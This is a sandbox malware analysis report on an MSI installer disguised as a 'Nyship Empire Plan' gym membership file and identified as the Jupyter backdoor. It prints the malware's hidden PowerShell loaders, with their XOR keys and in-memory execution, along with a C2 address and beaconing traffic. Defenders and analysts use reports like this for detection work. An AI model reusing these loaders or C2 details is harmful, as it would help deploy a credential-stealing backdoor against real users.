Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nyship-Empire-Plan-Gym-Membership.msi

Overview

General Information

Sample Name:Nyship-Empire-Plan-Gym-Membership.msi
Analysis ID:496721
MD5:f6118522893f3cd95198527d6f0282ba
SHA1:dd9b59d2553043a4740b9cd557c7dde0740050cf
SHA256:5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682
Infos:

Most interesting Screenshot:

Detection

Jupyter
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Jupyter backdoor
Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Sigma detected: Encoded FromBase64String
Sigma detected: Powershell Decrypt And Execute Base64 Data
Multi AV Scanner detection for dropped file
Sigma detected: FromBase64String Command Line
Bypasses PowerShell execution policy
Suspicious powershell command line found
Writes many files with high entropy
C2 URLs / IPs found in malware configuration
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6320 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5732 cmdline: C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 6024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6656 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1 MD5: 4767B71A318E201188A0D0A420C8B608)
      • PDFsamEnhanced7Installer.exe (PID: 616 cmdline: 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe' MD5: 801B1B11E979AF812CA4387E5F438AD8)
        • regsvr32.exe (PID: 6964 cmdline: regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
        • PDFsam_Enhanced_7_Installer.exe (PID: 7016 cmdline: 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer MD5: 801B1B11E979AF812CA4387E5F438AD8)
      • powershell.exe (PID: 2212 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6916 cmdline: 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Jupyter Backdoor

{"Version": "OC-1", "C2 url": "http://146.70.41.157"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Nyship-Empire-Plan-Gym-Membership.msiJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
      C:\Windows\Installer\MSI113A.tmpJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
        C:\Windows\Installer\5206a8.msiJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
          C:\Windows\Installer\5206aa.msiJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmpJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
              00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
              • 0x90be:$s4: -ep bypass
              • 0x5cd96:$s4: -ep bypass
              • 0xb0a6e:$s4: -ep bypass
              • 0x104746:$s4: -ep bypass
              • 0x15841e:$s4: -ep bypass
              • 0x8ad4:$s12: WscrIPT.sHell
              • 0x32ea0:$s12: WscrIPT.sHell
              • 0x5c7ac:$s12: WscrIPT.sHell
              • 0x86b78:$s12: WscrIPT.sHell
              • 0xb0484:$s12: WscrIPT.sHell
              • 0xda850:$s12: WscrIPT.sHell
              • 0x10415c:$s12: WscrIPT.sHell
              • 0x12e528:$s12: WscrIPT.sHell
              • 0x157e34:$s12: WscrIPT.sHell
              • 0x182200:$s12: WscrIPT.sHell
              00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
              • 0x90be:$s4: -ep bypass
              • 0x88246:$s4: -ep bypass
              • 0xdbf1e:$s4: -ep bypass
              • 0x12fbf6:$s4: -ep bypass
              • 0x1838ce:$s4: -ep bypass
              • 0x8ad4:$s12: WscrIPT.sHell
              • 0x32ea0:$s12: WscrIPT.sHell
              • 0x5c7ac:$s12: WscrIPT.sHell
              • 0x5d270:$s12: WscrIPT.sHell
              • 0xb2028:$s12: WscrIPT.sHell
              • 0xdb934:$s12: WscrIPT.sHell
              • 0x105d00:$s12: WscrIPT.sHell
              • 0x12f60c:$s12: WscrIPT.sHell
              • 0x1599d8:$s12: WscrIPT.sHell
              • 0x1832e4:$s12: WscrIPT.sHell
              • 0x1ad6b0:$s12: WscrIPT.sHell
              00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmpJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
                • 0x90be:$s4: -ep bypass
                • 0x5cd96:$s4: -ep bypass
                • 0xb0a6e:$s4: -ep bypass
                • 0x104746:$s4: -ep bypass
                • 0x15841e:$s4: -ep bypass
                • 0x8ad4:$s12: WscrIPT.sHell
                • 0x32ea0:$s12: WscrIPT.sHell
                • 0x5c7ac:$s12: WscrIPT.sHell
                • 0x86b78:$s12: WscrIPT.sHell
                • 0xb0484:$s12: WscrIPT.sHell
                • 0xda850:$s12: WscrIPT.sHell
                • 0x10415c:$s12: WscrIPT.sHell
                • 0x12e528:$s12: WscrIPT.sHell
                • 0x157e34:$s12: WscrIPT.sHell
                • 0x182200:$s12: WscrIPT.sHell
                Click to see the 6 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                21.2.powershell.exe.273b1806fc8.0.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                  21.2.powershell.exe.273b1806fc8.0.raw.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                    21.2.powershell.exe.273c9b50000.1.raw.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                      21.2.powershell.exe.273c9b50000.1.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Encoded FromBase64StringShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
                        Sigma detected: FromBase64String Command LineShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
                        Sigma detected: Non Interactive PowerShellShow sources
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
                        Sigma detected: T1086 PowerShell ExecutionShow sources
                        Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132778492979659065.2212.DefaultAppDomain.powershell

                        Data Obfuscation:

                        barindex
                        Sigma detected: Powershell Decrypt And Execute Base64 DataShow sources
                        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 21.2.powershell.exe.273b1806fc8.0.raw.unpackMalware Configuration Extractor: Jupyter Backdoor {"Version": "OC-1", "C2 url": "http://146.70.41.157"}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: Nyship-Empire-Plan-Gym-Membership.msiVirustotal: Detection: 12%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exeReversingLabs: Detection: 20%
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeReversingLabs: Detection: 20%
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
                        Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}Jump to behavior
                        Source: unknownHTTPS traffic detected: 64.15.159.234:443 -> 192.168.2.4:49785 version: TLS 1.2
                        Source: Binary string: ?crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMcrypto\ex_data.c source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb> source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\PDFsam_Enhanced_7_Installer.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                        Source: C:\Windows\System32\conhost.exeFile opened: c:
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                        Networking:

                        barindex
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://146.70.41.157
                        Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 313Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 509
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 415
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 675
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 612
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 640
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 600
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 474
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 464
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 705
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 721
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 322
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 665
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 277
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 653
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 443
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 609
